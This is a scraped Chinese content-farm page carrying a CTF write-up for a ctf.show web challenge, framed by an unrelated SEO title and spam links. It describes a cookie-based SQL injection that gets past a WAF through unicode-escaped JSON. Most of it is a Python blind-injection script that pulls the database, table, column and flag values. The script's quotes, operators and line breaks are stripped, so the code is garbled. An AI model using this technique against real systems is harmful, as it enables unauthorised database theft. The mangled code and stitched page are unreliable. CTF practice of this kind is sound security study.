当前位置: 首页 > news >正文

手机电脑网站建设电子商务ppt课件

手机电脑网站建设,电子商务ppt课件,南宁seo企业优化,微信平台开发多少钱0x00 前言 CTF 加解密合集CTF Web合集网络安全知识库溯源相关 文中工具皆可关注 皓月当空w 公众号 发送关键字 工具 获取 0x01 题目 0x02 Write Up 首先拿到题目#xff0c;先扫描一下#xff0c;发现一个www.zip 发现一个admin目录#xff0c;访问一下#xff1a; 在m…0x00 前言 CTF 加解密合集CTF Web合集网络安全知识库溯源相关 文中工具皆可关注 皓月当空w 公众号 发送关键字 工具 获取 0x01 题目 0x02 Write Up 首先拿到题目先扫描一下发现一个www.zip 发现一个admin目录访问一下 在member.php中发现一段代码这段代码中存在sql注入也就是在cookie中的sql注入 有一个要点是在代码中存在waf 这里有一个小知识就是json_decode可以识别unicode代码。那么我们可以将我们的测试poc改为unicode true的话会返回一组 false会返回两组 以此为依据可以进行遍历 脚本用的是大佬写好的脚本 #encodingutf-8 import requestsurl http://f17498a1-535d-45db-8840-09657e3b6c78.challenge.ctf.show/admin/def tamper(payload):payload payload.lower()payload payload.replace(u, \\u0075)payload payload.replace(\, \\u0027)payload payload.replace(o, \\u006f)payload payload.replace(i, \\u0069)payload payload.replace(, \\u0022)payload payload.replace( , \\u0020)payload payload.replace(s, \\u0073)payload payload.replace(#, \\u0023)payload payload.replace(, \\u003e)payload payload.replace(, \\u003c)payload payload.replace(-, \\u002d)payload payload.replace(, \\u003d)payload payload.replace(f1a9, F1a9)payload payload.replace(f1, F1)return payload#get database length def databaseName_len():print (start get database name length...)for l in range(0,45):payload 1 or (length(database()) str(l1) )#print(payload)payload tamper(payload)print(payload)tmpCookie islogin1;login_data{admin_user:%s,admin_pass:65} % payloadprint(tmpCookie)exit()headers {cookie: tmpCookie}r requests.get(url, headersheaders)myHeaders str(r.raw.headers)if ((myHeaders.count(login_data) 1)):print(get db length str(l).lower())break#get content def get_databaseName():flag for j in range(0, 15):for c in range(0x20,0x7f):if chr(c) \ or chr(c) ; or chr(c) \\ or chr(c) :continueelse:payload 1 or (select (database()) between flag chr(c) and chr(126) )##print(payload)payload tamper(payload)tmpCookie islogin1;login_data{admin_user:%s,admin_pass:65} % payloadheaders {cookie: tmpCookie}r requests.get(url, headersheaders)myHeaders str(r.raw.headers)if ((myHeaders.count(login_data) 2)):flag chr(c - 1)print(databasename flag.lower())break#get content def get_tableName():flag for j in range(0, 30): #blind injectfor c in range(0x20,0x7f):if chr(c) \ or chr(c) ; or chr(c) \\ or chr(c) :continueelse:payload 1 or (select (select table_name from information_schema.tables where table_schemadatabase() limit 3,1) between flag chr(c) and chr(126) )##print(payload)payload tamper(payload)tmpCookie islogin1;login_data{admin_user:%s,admin_pass:65} % payloadheaders {cookie: tmpCookie}r requests.get(url, headersheaders)myHeaders str(r.raw.headers)if ((myHeaders.count(login_data) 2)):flag chr(c - 1)print(tablename flag.lower())break#get content def get_ColumnName():flag for j in range(0, 10): #blind injectfor c in range(0x20,0x7f):if chr(c) \ or chr(c) ; or chr(c) \\ or chr(c) :continueelse:payload 1 or (select (select column_name from information_schema.columns where table_nameFL2333G limit 0,1) between flag chr(c) and chr(126) )##print(payload)payload tamper(payload)tmpCookie islogin1;login_data{admin_user:%s,admin_pass:65} % payloadheaders {cookie: tmpCookie}r requests.get(url, headersheaders)myHeaders str(r.raw.headers)if ((myHeaders.count(login_data) 2)):flag chr(c - 1)print(column name flag.lower())break#get content def get_value():flag for j in range(0, 50): #blind injectfor c in range(0x20,0x7f):if chr(c) \ or chr(c) ; or chr(c) \\ or chr(c) :continueelse:payload 1 or (select (select FLLLLLAG from FL2333G) between flag chr(c) and chr(126) )##print(payload)payload tamper(payload)tmpCookie islogin1;login_data{admin_user:%s,admin_pass:65} % payloadheaders {cookie: tmpCookie}r requests.get(url, headersheaders)myHeaders str(r.raw.headers)if ((myHeaders.count(login_data) 2)):flag chr(c - 1)print(flag flag.lower())breakprint (start database sql injection...) # databaseName_len() # get_databaseName() # get_tableName() # get_ColumnName() get_value()0x03 other 欢迎大家关注我朋友的公众号 皓月当空w 分享漏洞情报以及各种学习资源技能树面试题等。 以上
http://www.pierceye.com/news/229987/

相关文章:

  • 51CTO学院个人网站开发视频营销策划包括哪些内容
  • 专做排名的网站wordpress样式乱了
  • 网站空间域名维护协议网站备案的意义
  • word可以做网站链接吗网站推广的基本方法有哪些
  • 公司展示型网站wordpress后台邮箱怎么设置
  • 小程序咸鱼之王2022年搜索引擎优化指南
  • 企业网站建设 价格wordpress汉化主题
  • 兰州市建设厅官方网站做网站用的编程工具
  • 网站建设及维护招聘周口航迪科技网站建设公司怎么样
  • 服装外贸网站建设discuz应用
  • flash个人网站欣赏网站营销单页怎么做
  • 设计网站用什么语言网站建设需求范文
  • seo织梦网站建设步骤昆明网络营销软件
  • 企业网站 静态页面成都设计公司邮箱
  • 创世网站建设 优帮云北京网站建设工作室
  • 网站空间提供商哪个网站可以做英文兼职
  • 社区网站制作平台网站建设调研报告
  • 不会建网站怎么赚钱dw个人主页模板
  • 自助建站系统哪个好thinkphp做的网站源码
  • 广州企业网站模板建站现在有什么网站可以做兼职的
  • 网站开发 公司百度seo公司整站优化软件
  • 沈阳学网站制作学校网络推广龙岗比较好的
  • 佛山 建站公司网站风格一般具有哪三大特征
  • 网站的二级页面怎么做济南网站建设行知科技不错
  • 网站赢利如何查看实时街景地图
  • 手表网站欧米茄官方网络平台管理制度和管理办法
  • 北京网站建设网站网站不用工具开发建设
  • 杭州做网站外包公司有哪些网站幻灯片效果
  • 北京模板建站代理好看怎么上传视频网站吗
  • 品牌网站建设小科6a蚪html制作电影网页